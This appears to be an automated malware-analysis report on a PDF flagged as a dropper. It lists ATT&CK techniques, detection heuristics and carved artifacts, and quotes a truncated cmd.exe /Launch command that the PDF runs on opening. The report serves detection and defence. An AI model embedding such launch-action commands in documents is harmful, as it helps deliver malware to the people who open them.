MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1105 Ingress Tool Transfer
This PDF file contains embedded JavaScript and a launch action that executes cmd.exe. The command line indicates an attempt to download and execute a second-stage payload, likely a dropper, as suggested by the ClamAV detection 'Pdf.Dropper.Agent-7540147-0'. The specific command executed is 'cmd.exe /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\hping2_v1.5.pdf" (cd "Desktop"', which is designed to prepare the environment for further execution.
Heuristics 7
-
Launch action critical PDF_LAUNCHPDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
-
/Launch action target: cmd.exe critical PDF_LAUNCH_COMMANDPDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\hping2_v1.5.pdf" (cd "Desktop"' — references a known-dangerous executable (cmd, PowerShell, etc.).
-
ClamAV: Pdf.Dropper.Agent-7540147-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Dropper.Agent-7540147-0
-
Visible LOLBin command execution instruction high SE_LOLBIN_RUN_COMMANDDocument contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32
-
JavaScript action low PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0188_000.js88cfd521c32031f07d83cbda8948fa33ba224a83770188d884b7690e60397d20 |
pdf-javascript-stream | PDF /JS object 188 at offset 0x67673 | 60 bytes |
stream_007_off00001c85.bin04aaa3ae9b9fadd14a44a7903d3ca5d7ac8c848f9c97d0517916e5baa8ee0130 |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x1C85 | 1174 bytes |
font_00_cff_off0002ac6a.bin228e90e4993260e10a6a6faebb9e48e4745bd1d7206641a87eab37e6e53698c1 |
pdf-font-stream | PDF embedded font (cff) at offset 0x2AC6A | 9397 bytes |
font_01_cff_off0002d2fd.binc7569064a2c94465bbc4dde95bc29eb6617ad11b466fb74cb66e5f97ee2a32d0 |
pdf-font-stream | PDF embedded font (cff) at offset 0x2D2FD | 5236 bytes |
font_02_cff_off0002e9aa.bin5c3d9a8d7a76bff1023c23ca6c9a48ac6806fdafaa31424fead817a9ce7616cd |
pdf-font-stream | PDF embedded font (cff) at offset 0x2E9AA | 8179 bytes |
font_03_cff_off00030be8.bin209b09e46099f51af7458833c634329efd054fb011bb6f46c49886e2ccd59511 |
pdf-font-stream | PDF embedded font (cff) at offset 0x30BE8 | 6632 bytes |
font_04_cff_off0003279f.binff9de15caaafd11156644b26839ddc49cc0caeb4c3a6a38dde6b8ed813096755 |
pdf-font-stream | PDF embedded font (cff) at offset 0x3279F | 4311 bytes |
font_05_cff_off00033a9e.binbe106328688e2d9054c5532bf270a07bf22da24cd95fb4cad45363ecfd3e1f6c |
pdf-font-stream | PDF embedded font (cff) at offset 0x33A9E | 7034 bytes |
font_06_cff_off000358a3.bin99678a6932ac6faec4cb0aef5786ac7b1d7418c810e43e1844e2768026ddc580 |
pdf-font-stream | PDF embedded font (cff) at offset 0x358A3 | 8252 bytes |
font_07_cff_off00037ad7.binb7e2075334b90be50f82c89f0beaad3fff72e72b5a51b22e276369636e2443ae |
pdf-font-stream | PDF embedded font (cff) at offset 0x37AD7 | 4985 bytes |
font_08_cff_off0003907f.bin9f9a6a7fa3540c13fd3dcd83729fbe035c24507cbd41793caa76259583c0a771 |
pdf-font-stream | PDF embedded font (cff) at offset 0x3907F | 5760 bytes |
font_09_cff_off0003a922.bine5acddf1554932c2b19e09b710e2ad0fac657d7df0f1f72b0ac940b5e892c880 |
pdf-font-stream | PDF embedded font (cff) at offset 0x3A922 | 7370 bytes |
font_10_cff_off0003c84a.bin2fc82925be2994297817c249729ad748eea0406e2489a141ce9944fd7f70f783 |
pdf-font-stream | PDF embedded font (cff) at offset 0x3C84A | 9302 bytes |
font_11_cff_off0003eeb1.bin3229fd3dfb05a35f75df8e0c84b008740682fc7ab868bbe5e9b79b29b97210d7 |
pdf-font-stream | PDF embedded font (cff) at offset 0x3EEB1 | 5329 bytes |
font_12_cff_off000405d7.bin7fc456334bd44cf1ec7d1f97d6ad2ceee0db730c21b57e29bae155d4f1be62c2 |
pdf-font-stream | PDF embedded font (cff) at offset 0x405D7 | 7092 bytes |
font_13_cff_off0004239e.bin18ae16f8003cd2feb2b9f88cea379aa51aac54954ab06888b09aa7180106feb9 |
pdf-font-stream | PDF embedded font (cff) at offset 0x4239E | 6690 bytes |
font_14_cff_off00043f96.binb072f46064d1f62bd29f45ddce1b1451f06e7fe4d41bf485fc8accb21b38176d |
pdf-font-stream | PDF embedded font (cff) at offset 0x43F96 | 4945 bytes |
font_15_cff_off000454d4.binfc6d0cb83a4c8872293e7a68ef6de413a8f0a7379c828733ddce4f13f5450a16 |
pdf-font-stream | PDF embedded font (cff) at offset 0x454D4 | 5283 bytes |
font_16_cff_off00046b86.bin823f05a9bcc77c17c56140e6bd5deda9d3c7f5ee906eb125d0e26cc82b920c0f |
pdf-font-stream | PDF embedded font (cff) at offset 0x46B86 | 5618 bytes |
font_17_cff_off0004835b.bin939079e38b428f4920cccba851f012642986552bfcba18f728e75e5c52da05f0 |
pdf-font-stream | PDF embedded font (cff) at offset 0x4835B | 4735 bytes |
font_18_cff_off0004982c.bineb3097e7ea77c8cc142d2c2180e753788a7e73cebc2553fbabdbbb06306c771b |
pdf-font-stream | PDF embedded font (cff) at offset 0x4982C | 9210 bytes |
font_19_cff_off0004be52.bincbb40c01088c3f15437344d855bc5120e501226ebf230ceb03b96c9145b671ab |
pdf-font-stream | PDF embedded font (cff) at offset 0x4BE52 | 6426 bytes |
font_20_cff_off0004d92e.binf8674673f03f78780f1e4146d156107c85f967474a01e2b8b58e27fc72750679 |
pdf-font-stream | PDF embedded font (cff) at offset 0x4D92E | 3363 bytes |
font_21_cff_off0004e8a1.binc1c90a6cb422e93face4f4f7938152665529290923f3904df119bfa8a6a6586b |
pdf-font-stream | PDF embedded font (cff) at offset 0x4E8A1 | 9170 bytes |
font_22_cff_off00050e90.bina950d9e8cececc97635d7b91d82e5f72ea6cfb1b30654ee7d404ba940de1e591 |
pdf-font-stream | PDF embedded font (cff) at offset 0x50E90 | 6726 bytes |
font_23_cff_off00052b0d.bin27bc49ded50a5821595f43d070c8c22c230f3ff133033ce5dbb95b130fe75e3d |
pdf-font-stream | PDF embedded font (cff) at offset 0x52B0D | 7860 bytes |
font_24_cff_off00054c06.binf481ee6799ed43ac3f6cf9706ddebe6468f83bd05fd581793cf98c99bc203f17 |
pdf-font-stream | PDF embedded font (cff) at offset 0x54C06 | 6218 bytes |
font_25_cff_off0005668d.bin32b2d153d9f0256bb79f5fff41773beeb9f815ff490421459f8a5836214deae5 |
pdf-font-stream | PDF embedded font (cff) at offset 0x5668D | 8056 bytes |
font_26_cff_off00058773.bina9d4fe489a2614ecccfbf96489e1627920902ddb77026e26d9a4311c22640759 |
pdf-font-stream | PDF embedded font (cff) at offset 0x58773 | 762 bytes |
font_27_cff_off00058ca8.bin890b91886042b3568a0a822ff33f43036ee3e7f9e7ec709072ad6602bac8b257 |
pdf-font-stream | PDF embedded font (cff) at offset 0x58CA8 | 7944 bytes |
font_28_cff_off0005adba.binf2213c066cb6f74e874b4a3ec694719eff859b77da0075a1b4edeb4d3faaded6 |
pdf-font-stream | PDF embedded font (cff) at offset 0x5ADBA | 6511 bytes |
font_29_cff_off0005c90b.bin5d90f4b54e64eada4c630068b02728517698d6f2bbb25699852f641a5fad4674 |
pdf-font-stream | PDF embedded font (cff) at offset 0x5C90B | 6394 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.